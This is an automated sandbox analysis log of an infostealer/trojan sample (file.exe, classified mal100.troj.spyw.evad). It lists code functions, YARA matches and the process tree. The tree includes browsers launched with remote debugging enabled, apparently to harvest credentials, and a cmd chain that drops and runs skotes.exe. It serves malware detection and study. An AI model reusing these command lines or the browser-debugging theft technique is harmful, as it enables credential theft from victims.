Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C650512 0_2_6C650512
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6885F0 0_2_6C6885F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C660DD0 0_2_6C660DD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C696E63 0_2_6C696E63
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C62C670 0_2_6C62C670
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C644640 0_2_6C644640
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C672E4E 0_2_6C672E4E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C649E50 0_2_6C649E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C663E50 0_2_6C663E50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C689E30 0_2_6C689E30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C675600 0_2_6C675600
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C667E10 0_2_6C667E10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6976E3 0_2_6C6976E3
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C62BEF0 0_2_6C62BEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63FEF0 0_2_6C63FEF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C684EA0 0_2_6C684EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C68E680 0_2_6C68E680
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C645E90 0_2_6C645E90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C639F00 0_2_6C639F00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C667710 0_2_6C667710
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C62DFE0 0_2_6C62DFE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C656FF0 0_2_6C656FF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6777A0 0_2_6C6777A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C66F070 0_2_6C66F070
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C648850 0_2_6C648850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C64D850 0_2_6C64D850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C66B820 0_2_6C66B820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C674820 0_2_6C674820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C637810 0_2_6C637810
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C64C0E0 0_2_6C64C0E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6658E0 0_2_6C6658E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6950C7 0_2_6C6950C7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6560A0 0_2_6C6560A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63D960 0_2_6C63D960
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C67B970 0_2_6C67B970
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C69B170 0_2_6C69B170
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C64A940 0_2_6C64A940
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C62C9A0 0_2_6C62C9A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C65D9B0 0_2_6C65D9B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C665190 0_2_6C665190
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C682990 0_2_6C682990
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C669A60 0_2_6C669A60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C641AF0 0_2_6C641AF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C66E2F0 0_2_6C66E2F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C668AC0 0_2_6C668AC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6222A0 0_2_6C6222A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C654AA0 0_2_6C654AA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63CAB0 0_2_6C63CAB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C692AB0 0_2_6C692AB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C69BA90 0_2_6C69BA90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63C370 0_2_6C63C370
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C625340 0_2_6C625340
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C66D320 0_2_6C66D320
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6953C8 0_2_6C6953C8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C62F380 0_2_6C62F380
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6DAC60 0_2_6C6DAC60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7AAC30 0_2_6C7AAC30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C796C00 0_2_6C796C00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C72ECD0 0_2_6C72ECD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6CECC0 0_2_6C6CECC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C79ED70 0_2_6C79ED70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7FAD50 0_2_6C7FAD50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C85CDC0 0_2_6C85CDC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C858D20 0_2_6C858D20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6D4DB0 0_2_6C6D4DB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C766D90 0_2_6C766D90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C76EE70 0_2_6C76EE70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7B0E20 0_2_6C7B0E20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6DAEC0 0_2_6C6DAEC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C770EC0 0_2_6C770EC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C756E90 0_2_6C756E90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C792F70 0_2_6C792F70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C818FB0 0_2_6C818FB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C73EF40 0_2_6C73EF40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6D6F10 0_2_6C6D6F10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7AEFF0 0_2_6C7AEFF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6D0FE0 0_2_6C6D0FE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C810F20 0_2_6C810F20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6DEFB0 0_2_6C6DEFB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7A4840 0_2_6C7A4840
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C720820 0_2_6C720820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C75A820 0_2_6C75A820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7D68E0 0_2_6C7D68E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7BC8C0 0_2_6C7BC8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C708960 0_2_6C708960
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C726900 0_2_6C726900
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7049F0 0_2_6C7049F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7EC9E0 0_2_6C7EC9E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7909B0 0_2_6C7909B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7609A0 0_2_6C7609A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C78A9A0 0_2_6C78A9A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C74CA70 0_2_6C74CA70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C788A30 0_2_6C788A30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C77EA00 0_2_6C77EA00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C74EA80 0_2_6C74EA80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7D6BE0 0_2_6C7D6BE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6D8BAC 0_2_6C6D8BAC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C770BA0 0_2_6C770BA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6E8460 0_2_6C6E8460
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C75A430 0_2_6C75A430
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C734420 0_2_6C734420
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7164D0 0_2_6C7164D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C76A4D0 0_2_6C76A4D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7FA480 0_2_6C7FA480
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C770570 0_2_6C770570
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C732560 0_2_6C732560
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C728540 0_2_6C728540
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7D4540 0_2_6C7D4540
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C75E5F0 0_2_6C75E5F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C79A5E0 0_2_6C79A5E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C818550 0_2_6C818550
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6C45B0 0_2_6C6C45B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C72C650 0_2_6C72C650
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C72E6E0 0_2_6C72E6E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C76E6E0 0_2_6C76E6E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6F46D0 0_2_6C6F46D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C750700 0_2_6C750700
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6FA7D0 0_2_6C6FA7D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C71E070 0_2_6C71E070
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C798010 0_2_6C798010
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C79C000 0_2_6C79C000
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7AC0B0 0_2_6C7AC0B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6E00B0 0_2_6C6E00B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6C8090 0_2_6C6C8090
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8261B0 0_2_6C8261B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C738140 0_2_6C738140
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C746130 0_2_6C746130
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7B4130 0_2_6C7B4130
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6D01E0 0_2_6C6D01E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C758260 0_2_6C758260
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C768250 0_2_6C768250
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8562C0 0_2_6C8562C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7A8220 0_2_6C7A8220
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C79A210 0_2_6C79A210
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C79E2B0 0_2_6C79E2B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7A22A0 0_2_6C7A22A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C766370 0_2_6C766370
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6D2370 0_2_6C6D2370
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7EC360 0_2_6C7EC360
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6D8340 0_2_6C6D8340
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Code function: 20_2_00725C83 20_2_00725C83
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Code function: 20_2_0072735A 20_2_0072735A
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Code function: 20_2_00768860 20_2_00768860
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Code function: 20_2_00724DE0 20_2_00724DE0
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Code function: 20_2_00724B30 20_2_00724B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 21_2_010231A8 21_2_010231A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 21_2_01027049 21_2_01027049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 21_2_01028860 21_2_01028860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 21_2_010278BB 21_2_010278BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 21_2_00FE4B30 21_2_00FE4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 21_2_01022D10 21_2_01022D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 21_2_00FE4DE0 21_2_00FE4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 21_2_01017F36 21_2_01017F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 21_2_0102779B 21_2_0102779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_00FEE530 23_2_00FEE530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_01006192 23_2_01006192
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_01028860 23_2_01028860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_00FE4B30 23_2_00FE4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_01022D10 23_2_01022D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_00FE4DE0 23_2_00FE4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_01000E13 23_2_01000E13
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_010231A8 23_2_010231A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_01027049 23_2_01027049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_0102779B 23_2_0102779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_01001602 23_2_01001602
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_010278BB 23_2_010278BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_01003DF1 23_2_01003DF1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_01017F36 23_2_01017F36
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C85DAE0 appears 49 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C6F9B10 appears 49 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C85D930 appears 40 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C6F3620 appears 52 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C6694D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C65CBE8 appears 134 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C8509D0 appears 215 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 01018E10 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00FFDF80 appears 64 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00FFD64E appears 66 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00FFD942 appears 85 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00FFD663 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00FF80C0 appears 263 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: String function: 00FF7A00 appears 38 times
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Code function: String function: 007380C0 appears 130 times
Source: file.exe, 00000000.00000002.2445370306.000000006C6B2000.00000002.00000001.01000000.0000000A.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: amsi32_8712.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 8712, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: file.exe Static PE information: Section: xxdbzcjj ZLIB complexity 0.9948846726190477
Source: file1[1].exe.23.dr Static PE information: Section: ZLIB complexity 0.9992582208188153
Source: file1[1].exe.23.dr Static PE information: Section: ytlmplcn ZLIB complexity 0.994779892714201
Source: file1.exe.23.dr Static PE information: Section: ZLIB complexity 0.9992582208188153
Source: file1.exe.23.dr Static PE information: Section: ytlmplcn ZLIB complexity 0.994779892714201
Source: random[1].exe0.23.dr Static PE information: Section: xxdbzcjj ZLIB complexity 0.9948846726190477
Source: 3160604f40.exe.23.dr Static PE information: Section: xxdbzcjj ZLIB complexity 0.9948846726190477
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@95/332@65/32
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C687030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C687030
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\M4PJU0MA.htm Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8184:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8744:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5080:120:WilError_03
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe File created: C:\Users\user\AppData\Local\Temp\c397cfa7-4e59-49ce-b9b9-c6e3f633cda4.tmp Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe, 00000000.00000002.2431656136.000000001D5D5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2444941785.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: file.exe, 00000000.00000002.2431656136.000000001D5D5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2444941785.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2431656136.000000001D5D5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2444941785.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2431656136.000000001D5D5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2444941785.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: file.exe, file.exe, 00000000.00000002.2431656136.000000001D5D5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2444941785.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2431656136.000000001D5D5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2444941785.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2431656136.000000001D5D5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2444941785.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000003.2181905406.000000001D4A9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269966395.000000001D49D000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756308716.0000000005A96000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2756924614.0000000005A79000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2767812066.0000000005A9A000.00000004.00000800.00020000.00000000.sdmp, file1.exe, 00000018.00000003.2768557455.0000000005A7D000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2877562568.0000000005624000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2878901520.0000000005605000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2890347826.000000000562E000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3054993967.0000000005D13000.00000004.00000800.00020000.00000000.sdmp, 4136f86ac7.exe, 00000025.00000003.3039810033.0000000005C19000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2431656136.000000001D5D5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2444941785.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: file.exe, 00000000.00000002.2431656136.000000001D5D5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2444941785.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: file.exe ReversingLabs: Detection: 36%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 --field-trial-handle=2168,i,14858037877617579678,5688177104923091675,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2268 --field-trial-handle=2224,i,5174629620199250997,17853157087695469379,262144 /prefetch:3
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=1924,i,17425948920218244720,978169003850622047,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7124 --field-trial-handle=1924,i,17425948920218244720,978169003850622047,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7304 --field-trial-handle=1924,i,17425948920218244720,978169003850622047,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsECAFHIIJJE.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\DocumentsECAFHIIJJE.exe "C:\Users\user\DocumentsECAFHIIJJE.exe"
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
